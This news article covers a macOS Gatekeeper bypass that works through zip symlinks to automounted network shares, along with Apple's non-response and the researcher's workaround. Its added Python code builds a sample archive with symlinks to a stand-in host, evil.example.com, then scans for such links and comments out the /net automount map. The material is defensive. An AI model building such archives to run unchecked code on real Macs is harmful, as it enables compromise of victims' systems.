- An Italian researcher has demonstrated a macOS vulnerability that lets an attacker bypass Gatekeeper.
- The researcher has publicly released the PoC code and a video, but Apple hasn’t released a fix yet.
- Apple shipped a related Gatekeeper fix in the previous update, but it apparently does not cover this case.
According to Italian security researcher Filippo Cavallarin, macOS Mojave 10.14.5 and older are vulnerable to an arbitrary code execution flaw that Apple has so far declined to address. The vulnerability lets an attacker bypass Gatekeeper, the built-in macOS check on software a user downloads and opens, and run whatever they want without any certificate verification or other validation taking place. Cavallarin found that Gatekeeper treats external drives and network shares as safe locations and that the macOS automounter will mount a remote share on demand the moment a path under it is accessed; combining that behaviour with symbolic links is enough to run arbitrary code without ever triggering Gatekeeper.
To demonstrate the vulnerability, the researcher created a zip archive containing symbolic links that point to automount endpoints he controls. The archive is sent to the victim, downloaded onto the target system and extracted; when the victim opens the symlink, macOS mounts the attacker’s share and takes the victim to a location that the attacker controls and that Gatekeeper never inspected. Gatekeeper vets the downloaded archive and what it extracts, but the files behind the link were never downloaded, so the attacker can place whatever they want there, including malicious code, and it runs without a prompt. The researcher’s short video shows exactly how that scenario unfolds in practice.
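Because the archive itself looks harmless, the thing worth checking on the receiving side is whether any symlink inside it resolves under an automounter path. The following scanner is an added example written for this article, not the researcher’s PoC or any Apple code: it constructs a sample archive of the shape described above (the hostname, share name and extraction directory are placeholders) and then lists every symlink entry whose target, absolute or relative, lands under /net once the archive is extracted.

```python
import io
import posixpath
import stat
import zipfile

# Automounter prefix from the default /etc/auto_master: "/net" is the -hosts
# map, so /net/<hostname>/<export> is mounted the first time it is accessed.
AUTOMOUNT_PREFIXES = ("/net/",)


def build_sample_archive() -> bytes:
    """Construct, in memory, an archive shaped like the one the article describes.
    Constructed sample for the scanner below, not the researcher's PoC; the
    hostname and export path are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "nothing to see here\n")
        # A zip symlink is an entry with S_IFLNK in the high 16 bits of
        # external_attr; the entry's data is the link target.
        for name, target in (
            ("Documents", "/net/evil.example.com/share"),       # absolute target
            ("Photos", "../../../net/evil.example.com/share"),  # relative, escapes ~/Downloads
        ):
            link = zipfile.ZipInfo(name)
            link.create_system = 3  # Unix, so extraction tools honour the mode bits
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, target)
    return buf.getvalue()


def find_automount_symlinks(archive_bytes: bytes,
                            extract_dir: str = "/Users/victim/Downloads",
                            prefixes=AUTOMOUNT_PREFIXES):
    """Return (entry name, link target, resolved path) for every symlink entry
    whose target lands under an automount prefix once the archive is extracted
    into extract_dir (assumed default; pass the real one). Relative targets are
    resolved against extract_dir so '../../../net/...' is caught as well."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if not stat.S_ISLNK(info.external_attr >> 16):
                continue  # regular file or directory entry
            target = zf.read(info).decode("utf-8", "replace")
            resolved = posixpath.normpath(posixpath.join(extract_dir, target))
            if any(resolved.startswith(p) for p in prefixes):
                hits.append((info.filename, target, resolved))
    return hits


if __name__ == "__main__":
    for name, target, resolved in find_automount_symlinks(build_sample_archive()):
        print(f"{name} -> {target}  (resolves to {resolved})")
```

The check reads the central directory only; nothing is extracted and no link is followed, which matters because following the link is precisely what triggers the mount.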
The proof of concept is straightforward and Apple has had it since February 22, 2019, yet the company has not fixed the issue even though it initially accepted the report as valid. From May 15, 2019 onwards Apple stopped responding to the researcher’s messages warning of the approaching disclosure deadline, so here we are. As there is no fix yet, the only mitigation for macOS users worried about this is to disable the automount functionality on their system. The researcher lists the following steps:
- Edit /etc/auto_master as root
- Comment the line beginning with ‘/net’
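The edit is a one-line change, but it is easy to get wrong by hand (commenting the wrong map, or leaving a second /net line active). The helper below is an added example for this article, not the researcher’s script: it takes the contents of auto_master, comments out every active line beginning with /net, leaves the other maps alone, and offers a check that confirms nothing /net-related is still enabled. The embedded file is a constructed copy of a stock Mojave auto_master; compare it with your own before trusting it. After writing the file, automountd has to reread the map, so run `sudo automount -vc` or reboot.

```python
import re
import shutil

# Constructed copy of a stock macOS Mojave /etc/auto_master. Only the "/net"
# line is relevant to the workaround; "/home" and the others stay as they are.
SAMPLE_AUTO_MASTER = """\
#
# Automounter master map
#
+auto_master\t\t# Use directory service
/net\t\t\t-hosts\t\t-nobrowse,hidefromfinder,nosuid
/home\t\t\tauto_home\t-nobrowse,hidefromfinder
/Network/Servers\t-fstab
/-\t\t\t-static
"""

# An active /net map line: optional leading blanks, then "/net" as a whole
# word (so "/network" would not match), then the rest of the line.
_NET_LINE = re.compile(r"^([ \t]*)(/net\b.*)$", re.MULTILINE)


def disable_net_automount(text: str) -> str:
    """Return auto_master contents with every active '/net' map line commented
    out, which is the researcher's workaround. Lines that are already comments
    do not match, so applying the function twice changes nothing."""
    return _NET_LINE.sub(lambda m: f"{m.group(1)}#{m.group(2)}", text)


def net_automount_active(text: str) -> bool:
    """True if an uncommented '/net' map line is still present."""
    return _NET_LINE.search(text) is not None


def rewrite_auto_master(path: str = "/etc/auto_master") -> bool:
    """Apply the workaround to a file on disk (needs root on macOS), keeping a
    .bak copy. Returns True if the file was changed. Reload the map afterwards
    with `sudo automount -vc` or reboot; this function does not do that."""
    with open(path, encoding="utf-8") as fh:
        before = fh.read()
    after = disable_net_automount(before)
    if after == before:
        return False
    shutil.copy2(path, path + ".bak")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(after)
    return True


if __name__ == "__main__":
    patched = disable_net_automount(SAMPLE_AUTO_MASTER)
    print(patched)
    print("active /net map:", net_automount_active(patched))
```

`net_automount_active` doubles as a quick audit: run it over the current /etc/auto_master on every Mac you manage to see which ones still have the default map enabled.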
While the exploit method looks legitimate, there is some confusion stemming from the 10.14.4 release notes. In the “DesktopServices” section, CVE-2019-8589 promises improved checks that prevent malicious applications from bypassing Gatekeeper. Are those improvements not enough to mitigate the problem the Italian researcher describes, or did he miss the fix and falsely claim to have disclosed an unpatched flaw? Since he states at the beginning of his report that he used macOS 10.14.5, which already includes the 10.14.4 changes, I am choosing to rule out the latter. Most probably Apple’s engineers thought they had fixed it, but they hadn’t.